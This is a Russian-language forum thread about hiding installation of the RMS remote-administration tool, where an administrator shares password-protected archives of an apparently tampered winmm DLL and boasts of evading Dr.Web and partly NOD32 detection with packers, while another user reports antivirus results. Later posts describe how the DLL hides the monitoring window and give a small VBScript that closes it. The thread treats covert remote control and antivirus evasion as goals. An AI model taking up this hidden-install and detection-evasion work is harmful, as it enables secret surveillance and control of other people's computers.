RMS - полностью скрытая установка и управление.


X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
Вот вроде сбил детект Нода, заодно и проверим отсылает-ли этот сканер в езет инфу или нет:

Пароль:111

З.Ы. ДоХтор веб задолбал, всё-время детектит Dr.Web:Trojan.Hooker.21745 заело его что-ли !Отдыхай!!!
 

Вложения

  • winmm1.rar
    7.5 КБ · Просмотры: 14

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
Вот вроде сбил детект Нода, заодно и проверим отсылает-ли этот сканер в езет инфу или нет:

Пароль:111

З.Ы. ДоХтор веб задолбал, всё-время детектит Dr.Web:Trojan.Hooker.21745 заело его что-ли !Отдыхай!!!

cs619317.vk.me_v619317034_13f62_NN8AxhsY4F8.jpg

нод как ругался, так и ругается :(
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
Странно, а в сканере вроде не детектит !Не въехал!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
нод как ругался, так и ругается :(
УРЯЯЯЯ СБИЛ ДЕТЕКТ ДОХТОРА.................:utenok: :utenok: :utenok:

Попробуй сейчас и живая-ли она, на запуск не проверял:

Пароль:123
 

Вложения

  • winmm2.rar
    108.4 КБ · Просмотры: 12

Magic_Mushroom

Уважаемый пользователь
Форумчанин
Регистрация
30.06.2014
Сообщения
178
Репутация
78
УРЯЯЯЯ СБИЛ ДЕТЕКТ ДОХТОРА.................:utenok: :utenok: :utenok:

Попробуй сейчас и живая-ли она, на запуск не проверял:

Пароль:123


cs619317.vk.me_v619317034_13f85_ZjzPn3hCzi4.jpg

нод продолжает ругаться :с
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
заодно и проверим отсылает-ли этот сканер в езет инфу
У них либо базы старые, либо специально так делают, что нод якобы не детектит...

Будете меня ругать, но не смог сдержаться, залил на VT, там нод детектит !Dmeh-Smeh-Smeh!!!

Но не этот билд, а другой упакованный сразу двумя пакерами !My mind

 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
В этоге поняли, что нод рулит...

Пока я его не могу обойти пакерами, все остальные из топа получилось обойти по крайне-мере сканеры...
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
Последние пара слов про РМС, что-то никак не мог успакоится и дизасемблировал эту длл-ку, оказалось что это стандартная виндовая длл, Мистер Бёрнс туда каким-то образом внедрил процедуры, у меня в дизасемблере она называется так: [ RMS HOOK 2013, Mr.Burns ] !

Далее там непонятная мне бла-бла-бла, но заинтересовал этот код: push WC10001248_RMS_WND_HID
Это внесение данных в стек, отлично смотрим что-же там такое: unicode 'RMS_WND_HID',0000h
Короче поняли одно 'RMS_WND_HID' это и есть имя нашего окна наблюдения, значит и закрыть его мы можем не прибегая к помощи дллки, при помощи нашей "Штучки"...Отдыхай!!!

В общем-то вся инфа есть, кто захочет тот сам сделает !

Приведу пример "Штучки" на vbs:

Код:
Set shell = WScript.CreateObject("WScript.Shell")
timeout = 5
title = "RMS_WND_HID"
Do
If shell.AppActivate(title) Then
Shell.SendKeys "%{F4}"
 
End If
WScript.Sleep 300
timeout = timeout - 1
 
Loop

Можно сделать и начём-нить другом, вот-так !WinkSmile
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 102
Репутация
8 223
Тут ещё вопрос а как внедрить в виндовую длл свой код, это какую-то тулзу нужно или как, длл-ка отличается от виндовой только этим кодом вроде и всё, да-же процедуры те-же ?Не въехал!!!
 
Верх Низ